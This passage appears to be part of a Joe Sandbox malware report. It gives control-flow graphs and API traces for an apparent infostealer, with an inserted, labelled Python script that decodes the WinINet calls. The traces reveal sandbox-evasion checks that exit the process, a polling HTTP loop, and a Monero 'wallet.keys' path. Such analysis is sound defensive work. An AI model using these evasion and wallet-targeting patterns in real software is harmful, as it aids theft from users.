                             • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                            • String ID: ERROR$ERROR$GET
                            • API String ID: 3749127164-2509457195
                            • Opcode ID: f62ee5e4de6b2e0377c20a4b9cfa83d8a764446e5f330cbac4c2934790711eea
                            • Instruction ID: e4013ae3073bcc008fea48efc0b58e6e050673e7f22e39b3cd29034a2633060a
                            • Opcode Fuzzy Hash: f62ee5e4de6b2e0377c20a4b9cfa83d8a764446e5f330cbac4c2934790711eea
                            • Instruction Fuzzy Hash: 84714E71A00218ABEF15DF90CC46FEE77B8FB45701F108199F90A6B190DBB46A89DF52
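The two WinINet request functions and the GetProcAddress resolver listed above appear in the report only as raw API lines with hex arguments. The Python script below is an added example, not part of the Joe Sandbox report and not code from the sample. It parses lines in that listing format, decodes the constants the listing shows only as hex (InternetOpenA access type, InternetConnectA service, HttpOpenRequestA flags, InternetSetOptionA option, HttpQueryInfoA info level, InternetReadFile chunk size, Sleep interval) using the public wininet.h and Win32 values, checks whether a function's own calls form the complete InternetOpenA, InternetConnectA, HttpOpenRequestA, HttpSendRequestA, InternetReadFile sequence in call-site order and returns the HTTP verb, and groups GetProcAddress calls by module handle, which is the per-module import count the control-flow graph of the resolver reports. The sample lines are copied from this report's listings (one LoadLibraryA argument list is trimmed); which DLL each module handle belongs to is not in the listing and is not assumed.

```python
import re
from collections import Counter, namedtuple

# Constructed sample: lines copied from this report's "APIs" listings (the
# LoadLibraryA argument list is trimmed), one string per listed function.
HTTP_FUNC_LINES = """
• Part of subcall function 003447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00344849
• InternetOpenA.WININET(00360DFE,00000001,00000000,00000000,00000000), ref: 003462E1
• InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00346335
• HttpOpenRequestA.WININET(00000000,GET,?,00FBE2E0,00000000,00000000,00400100,00000000), ref: 00346385
• InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003463BF
• HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003463D1
• HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 003463FD
• InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0034646D
• InternetCloseHandle.WININET(00000000), ref: 003464EF
"""
RESOLVER_LINES = """
• GetProcAddress.KERNEL32(74DD0000,00FA5530), ref: 00359C2D
• GetProcAddress.KERNEL32(74DD0000,00FA52F0), ref: 00359C45
• LoadLibraryA.KERNEL32(00FBCFE8,?,00355CA3,00360AEB), ref: 0035A03D
• GetProcAddress.KERNEL32(6F070000,00FA5750), ref: 0035A5DA
• GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0035A5F1
• GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0035A607
"""

# "Part of subcall function X:" marks a call made by a callee, not by the function itself.
LINE_RE = re.compile(
    r"^\s*•?\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<func>\w+)\.(?P<dll>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
# args: raw strings, "?" where the sandbox recovered no value; ref: call-site address
Call = namedtuple("Call", "func dll args ref nested")

def parse_calls(text):
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            calls.append(Call(m["func"], m["dll"], args, int(m["ref"], 16), m["sub"] is not None))
    return calls

def _hex(arg):  # int for an 8-hex-digit argument, None for "?" or a plaintext string
    return int(arg, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", arg) else None

# Public WinINet constants (wininet.h); the listing shows only the raw hex.
HTTP_OPEN_REQUEST_FLAGS = {
    0x80000000: "INTERNET_FLAG_RELOAD", 0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x00800000: "INTERNET_FLAG_SECURE", 0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT", 0x00080000: "INTERNET_FLAG_NO_COOKIES",
    0x00002000: "INTERNET_FLAG_IGNORE_CERT_DATE_INVALID", 0x00001000: "INTERNET_FLAG_IGNORE_CERT_CN_INVALID",
    0x00000200: "INTERNET_FLAG_NO_UI", 0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE"}

def decode_flags(value):
    names = [n for bit, n in HTTP_OPEN_REQUEST_FLAGS.items() if value & bit]
    rest = value & ~sum(HTTP_OPEN_REQUEST_FLAGS)  # bits with no known name
    return "|".join(names + ([hex(rest)] if rest else [])) or "0"

# func -> (argument index, parameter name, decoder for that argument)
DECODERS = {
    "InternetOpenA": (1, "dwAccessType", {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT", 3: "INTERNET_OPEN_TYPE_PROXY"}.get),
    "InternetConnectA": (5, "nService", {1: "INTERNET_SERVICE_FTP", 2: "INTERNET_SERVICE_GOPHER", 3: "INTERNET_SERVICE_HTTP"}.get),
    "HttpOpenRequestA": (6, "dwFlags", decode_flags),
    "InternetSetOptionA": (1, "dwOption", {2: "INTERNET_OPTION_CONNECT_TIMEOUT", 5: "INTERNET_OPTION_SEND_TIMEOUT", 6: "INTERNET_OPTION_RECEIVE_TIMEOUT", 31: "INTERNET_OPTION_SECURITY_FLAGS"}.get),
    "HttpQueryInfoA": (1, "dwInfoLevel", {1: "HTTP_QUERY_CONTENT_TYPE", 5: "HTTP_QUERY_CONTENT_LENGTH", 19: "HTTP_QUERY_STATUS_CODE", 22: "HTTP_QUERY_RAW_HEADERS_CRLF"}.get),
    "InternetReadFile": (2, "dwNumberOfBytesToRead", lambda v: f"{v} bytes per read"),
    "Sleep": (0, "dwMilliseconds", lambda v: f"{v / 1000:g} s")}

def decode_call(call):
    """Symbolic reading of the one argument worth decoding, or None."""
    spec = DECODERS.get(call.func)
    value = _hex(call.args[spec[0]]) if spec and spec[0] < len(call.args) else None
    if value is None:
        return None
    return f"{call.func} {spec[1]}=0x{value:X} -> {spec[2](value) or 'unknown'}"

WININET_CHAIN = ["InternetOpenA", "InternetConnectA", "HttpOpenRequestA",
                 "HttpSendRequestA", "InternetReadFile"]

def wininet_request_chain(calls):
    """HTTP verb if the function's own calls (subcalls excluded) contain the whole
    WinINet request sequence in call-site order; None otherwise."""
    own = sorted((c for c in calls if not c.nested), key=lambda c: c.ref)
    names, pos = [c.func for c in own], -1
    for step in WININET_CHAIN:
        if step not in names[pos + 1:]:
            return None
        pos = names.index(step, pos + 1)
    return next(c.args[1] for c in own if c.func == "HttpOpenRequestA")

def resolver_summary(calls):
    """GetProcAddress calls grouped by module handle: imports resolved per module,
    and names passed as plaintext rather than via a pointer to a decoded string."""
    per_module, plaintext = Counter(), {}
    for c in calls:
        if c.func == "GetProcAddress" and len(c.args) >= 2:
            per_module[c.args[0]] += 1
            if c.args[1] != "?" and _hex(c.args[1]) is None:
                plaintext.setdefault(c.args[0], []).append(c.args[1])
    return per_module, plaintext

if __name__ == "__main__":
    http = parse_calls(HTTP_FUNC_LINES)
    print(wininet_request_chain(http), *filter(None, map(decode_call, http)),
          resolver_summary(parse_calls(RESOLVER_LINES)), sep="\n")
```

Run stand-alone it prints the verb (GET), the decoded constants and the resolver summary. Two limits are worth keeping in mind when reading the output: the InternetSetOptionA value buffer is listed as "?", so the script can name the option (INTERNET_OPTION_SECURITY_FLAGS, a 4-byte DWORD) but not say which security flags were written; and the plaintext names resolved from module 6F070000 are WinINet exports, yet the listing itself never names that module, so the script reports the handle rather than guessing a DLL.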

                             Control-flow Graph (block id, address range, calls made in the block, successor blocks)
                             • 1090 355510-355577 call 355ad0 call 35a820 * 3 call 35a740 * 4 -> 1106
                             • 1106 35557c-355583 -> 1107, 1108
                             • 1107 355585-3555b6 call 35a820 call 35a7a0 call 341590 call 3551f0 -> 1123
                             • 1108 3555d7-35564c call 35a740 * 2 call 341590 call 3552c0 call 35a8a0 call 35a800 call 35aad0 StrCmpCA -> 1134, 1138
                             • 1123 3555bb-3555d2 call 35a8a0 call 35a800 -> 1134
                             • 1134 355693-3556a9 call 35aad0 StrCmpCA -> 1139, 1140
                             • 1138 35564e-35568e call 35a7a0 call 341590 call 3551f0 call 35a8a0 call 35a800 -> 1134
                             • 1139 3557dc-355844 call 35a8a0 call 35a820 * 2 call 341670 call 35a800 * 4 call 356560 call 341550 -> 1271
                             • 1140 3556af-3556b6 -> 1142, 1143
                             • 1142 3556bc-3556c3 -> 1146, 1147
                             • 1143 3557da-35585f call 35aad0 StrCmpCA -> 1161, 1162
                             • 1146 3556c5-355719 call 35a820 call 35a7a0 call 341590 call 3551f0 call 35a8a0 call 35a800 -> 1143
                             • 1147 35571e-355793 call 35a740 * 2 call 341590 call 3552c0 call 35a8a0 call 35a800 call 35aad0 StrCmpCA -> 1143, 1250
                             • 1161 355865-35586c -> 1168, 1169
                             • 1162 355991-3559f9 call 35a8a0 call 35a820 * 2 call 341670 call 35a800 * 4 call 356560 call 341550 -> 1271
                             • 1168 355872-355879 -> 1175, 1176
                             • 1169 35598f-355a14 call 35aad0 StrCmpCA -> 1198, 1199
                             • 1175 3558d3-355948 call 35a740 * 2 call 341590 call 3552c0 call 35a8a0 call 35a800 call 35aad0 StrCmpCA -> 1169, 1274
                             • 1176 35587b-3558ce call 35a820 call 35a7a0 call 341590 call 3551f0 call 35a8a0 call 35a800 -> 1169
                             • 1198 355a16-355a21 Sleep -> 1106
                             • 1199 355a28-355a91 call 35a8a0 call 35a820 * 2 call 341670 call 35a800 * 4 call 356560 call 341550 -> 1271
                             • 1250 355795-3557d5 call 35a7a0 call 341590 call 3551f0 call 35a8a0 call 35a800 -> 1143
                             • 1271 355ac3-355ac6 (exit)
                             • 1274 35594a-35598a call 35a7a0 call 341590 call 3551f0 call 35a8a0 call 35a800 -> 1169
                            APIs
                              • Part of subcall function 0035A820: lstrlen.KERNEL32(00344F05,?,?,00344F05,00360DDE), ref: 0035A82B
                              • Part of subcall function 0035A820: lstrcpy.KERNEL32(00360DDE,00000000), ref: 0035A885
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00355644
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003556A1
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00355857
                              • Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6
                              • Part of subcall function 003551F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00355228
                              • Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905
                              • Part of subcall function 003552C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00355318
                              • Part of subcall function 003552C0: lstrlen.KERNEL32(00000000), ref: 0035532F
                              • Part of subcall function 003552C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00355364
                              • Part of subcall function 003552C0: lstrlen.KERNEL32(00000000), ref: 00355383
                              • Part of subcall function 003552C0: lstrlen.KERNEL32(00000000), ref: 003553AE
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0035578B
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00355940
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00355A0C
                            • Sleep.KERNEL32(0000EA60), ref: 00355A1B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen$Sleep
                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                            • API String ID: 507064821-2791005934
                            • Opcode ID: 49983f49efdf7dd5245fae67bfcb26aae5bbcb08fe34ad067251c660a390ab86
                            • Instruction ID: 6784a190b17e26556996cf15ab75efa8d34b5fb7953fa0129cf09f45acaad1f6
                            • Opcode Fuzzy Hash: 49983f49efdf7dd5245fae67bfcb26aae5bbcb08fe34ad067251c660a390ab86
                            • Instruction Fuzzy Hash: 3FE151719109049ADB16FBB0DC52EED7778AF54301F408629BD076A0B1EF346B4DEBA2

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1301 3517a0-3517cd call 35aad0 StrCmpCA 1304 3517d7-3517f1 call 35aad0 1301->1304 1305 3517cf-3517d1 ExitProcess 1301->1305 1309 3517f4-3517f8 1304->1309 1310 3519c2-3519cd call 35a800 1309->1310 1311 3517fe-351811 1309->1311 1313 351817-35181a 1311->1313 1314 35199e-3519bd 1311->1314 1316 351835-351844 call 35a820 1313->1316 1317 3518f1-351902 StrCmpCA 1313->1317 1318 351951-351962 StrCmpCA 1313->1318 1319 351970-351981 StrCmpCA 1313->1319 1320 351913-351924 StrCmpCA 1313->1320 1321 351932-351943 StrCmpCA 1313->1321 1322 35185d-35186e StrCmpCA 1313->1322 1323 35187f-351890 StrCmpCA 1313->1323 1324 351821-351830 call 35a820 1313->1324 1325 3518ad-3518be StrCmpCA 1313->1325 1326 3518cf-3518e0 StrCmpCA 1313->1326 1327 35198f-351999 call 35a820 1313->1327 1328 351849-351858 call 35a820 1313->1328 1314->1309 1316->1314 1335 351904-351907 1317->1335 1336 35190e 1317->1336 1341 351964-351967 1318->1341 1342 35196e 1318->1342 1344 351983-351986 1319->1344 1345 35198d 1319->1345 1337 351926-351929 1320->1337 1338 351930 1320->1338 1339 351945-351948 1321->1339 1340 35194f 1321->1340 1350 351870-351873 1322->1350 1351 35187a 1322->1351 1329 351892-35189c 1323->1329 1330 35189e-3518a1 1323->1330 1324->1314 1331 3518c0-3518c3 1325->1331 1332 3518ca 1325->1332 1333 3518e2-3518e5 1326->1333 1334 3518ec 1326->1334 1327->1314 1328->1314 1352 3518a8 1329->1352 1330->1352 1331->1332 1332->1314 1333->1334 1334->1314 1335->1336 1336->1314 1337->1338 1338->1314 1339->1340 1340->1314 1341->1342 1342->1314 1344->1345 1345->1314 1350->1351 1351->1314 1352->1314
                            APIs
                            • StrCmpCA.SHLWAPI(00000000,block), ref: 003517C5
                            • ExitProcess.KERNEL32 ref: 003517D1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID: block
                            • API String ID: 621844428-2199623458
                            • Opcode ID: 090d29fa267a90885c0bb8245a064c62ece835a573edf620fd7afda2858c9c58
                            • Instruction ID: cd5b47e6c37dc69991c05395eb67945fb28f69a873b24decf2b1f13aeaf3b107
                            • Opcode Fuzzy Hash: 090d29fa267a90885c0bb8245a064c62ece835a573edf620fd7afda2858c9c58
                            • Instruction Fuzzy Hash: F8517DB4A00209EFDB06DFA0D954FBE77B9BF44305F108149EC06AB260D770E949DBA2

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1356 357500-35754a GetWindowsDirectoryA 1357 357553-3575c7 GetVolumeInformationA call 358d00 * 3 1356->1357 1358 35754c 1356->1358 1365 3575d8-3575df 1357->1365 1358->1357 1366 3575e1-3575fa call 358d00 1365->1366 1367 3575fc-357617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 357619-357626 call 35a740 1367->1369 1370 357628-357658 wsprintfA call 35a740 1367->1370 1377 35767e-35768e 1369->1377 1370->1377
                            APIs
                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00357542
                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0035757F
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00357603
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0035760A
                            • wsprintfA.USER32 ref: 00357640
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                            • String ID: :$C$\$6
                            • API String ID: 1544550907-1570250246
                            • Opcode ID: 14e2577ab4503efef5197481779491e1420f8146ca8f02b7aa7cb7be705484e3
                            • Instruction ID: e7d75af0a8dad5e6672adc0dc126fe16b35dcfc26427bb85886183c1fed48ae2
                            • Opcode Fuzzy Hash: 14e2577ab4503efef5197481779491e1420f8146ca8f02b7aa7cb7be705484e3
                            • Instruction Fuzzy Hash: A84173B1D04258ABDB11DB94DC45FDEBBB8AB18701F100199F9057B290E7746A48CBA5

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00359860: GetProcAddress.KERNEL32(74DD0000,00FB2C00), ref: 003598A1
                              • Part of subcall function 00359860: GetProcAddress.KERNEL32(74DD0000,00FB2AC8), ref: 003598BA
                              • Part of subcall function 00359860: GetProcAddress.KERNEL32(74DD0000,00FB2A20), ref: 003598D2
                              • Part of subcall function 00359860: GetProcAddress.KERNEL32(74DD0000,00FB2C18), ref: 003598EA
                              • Part of subcall function 00359860: GetProcAddress.KERNEL32(74DD0000,00FB2A80), ref: 00359903
                              • Part of subcall function 00359860: GetProcAddress.KERNEL32(74DD0000,00FB98D8), ref: 0035991B
                              • Part of subcall function 00359860: GetProcAddress.KERNEL32(74DD0000,00FA5330), ref: 00359933
                              • Part of subcall function 00359860: GetProcAddress.KERNEL32(74DD0000,00FA5510), ref: 0035994C
                              • Part of subcall function 00359860: GetProcAddress.KERNEL32(74DD0000,00FB2B58), ref: 00359964
                              • Part of subcall function 00359860: GetProcAddress.KERNEL32(74DD0000,00FB2C30), ref: 0035997C
                              • Part of subcall function 00359860: GetProcAddress.KERNEL32(74DD0000,00FB2AF8), ref: 00359995
                              • Part of subcall function 00359860: GetProcAddress.KERNEL32(74DD0000,00FB2978), ref: 003599AD
                              • Part of subcall function 00359860: GetProcAddress.KERNEL32(74DD0000,00FA53D0), ref: 003599C5
                              • Part of subcall function 00359860: GetProcAddress.KERNEL32(74DD0000,00FB2B28), ref: 003599DE
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                              • Part of subcall function 003411D0: ExitProcess.KERNEL32 ref: 00341211
                              • Part of subcall function 00341160: GetSystemInfo.KERNEL32(?), ref: 0034116A
                              • Part of subcall function 00341160: ExitProcess.KERNEL32 ref: 0034117E
                              • Part of subcall function 00341110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0034112B
                              • Part of subcall function 00341110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00341132
                              • Part of subcall function 00341110: ExitProcess.KERNEL32 ref: 00341143
                              • Part of subcall function 00341220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0034123E
                              • Part of subcall function 00341220: __aulldiv.LIBCMT ref: 00341258
                              • Part of subcall function 00341220: __aulldiv.LIBCMT ref: 00341266
                              • Part of subcall function 00341220: ExitProcess.KERNEL32 ref: 00341294
                              • Part of subcall function 00356770: GetUserDefaultLangID.KERNEL32 ref: 00356774
                              • Part of subcall function 00341190: ExitProcess.KERNEL32 ref: 003411C6
                              • Part of subcall function 00357850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003411B7), ref: 00357880
                              • Part of subcall function 00357850: RtlAllocateHeap.NTDLL(00000000), ref: 00357887
                              • Part of subcall function 00357850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0035789F
                              • Part of subcall function 003578E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00357910
                              • Part of subcall function 003578E0: RtlAllocateHeap.NTDLL(00000000), ref: 00357917
                              • Part of subcall function 003578E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0035792F
                              • Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,00FB9848,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
                              • Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
                              • Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12
                              • Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905
                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00FB9A18,?,0036110C,?,00000000,?,00361110,?,00000000,00360AEF), ref: 00356ACA
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00356AE8
                            • CloseHandle.KERNEL32(00000000), ref: 00356AF9
                            • Sleep.KERNEL32(00001770), ref: 00356B04
                            • CloseHandle.KERNEL32(?,00000000,?,00FB9A18,?,0036110C,?,00000000,?,00361110,?,00000000,00360AEF), ref: 00356B1A
                            • ExitProcess.KERNEL32 ref: 00356B22
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                            • String ID:
                            • API String ID: 2525456742-0
                            • Opcode ID: 45ed4b06d99a617b7b83e3421213b0d9395812c9f85d6f73082c9fc652649ca1
                            • Instruction ID: fb08d099a272fc85193b19a40129ac7c8c600d824d8a92146aee17965a2e63c1
                            • Opcode Fuzzy Hash: 45ed4b06d99a617b7b83e3421213b0d9395812c9f85d6f73082c9fc652649ca1
                            • Instruction Fuzzy Hash: 6A313070904608AADB06F7F0DC57FEE7778AF14342F404619F902AA1A1EF70694DE7A2

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1436 341220-341247 call 3589b0 GlobalMemoryStatusEx 1439 341273-34127a 1436->1439 1440 341249-341271 call 35da00 * 2 1436->1440 1442 341281-341285 1439->1442 1440->1442 1444 341287 1442->1444 1445 34129a-34129d 1442->1445 1447 341292-341294 ExitProcess 1444->1447 1448 341289-341290 1444->1448 1448->1445 1448->1447
                            APIs
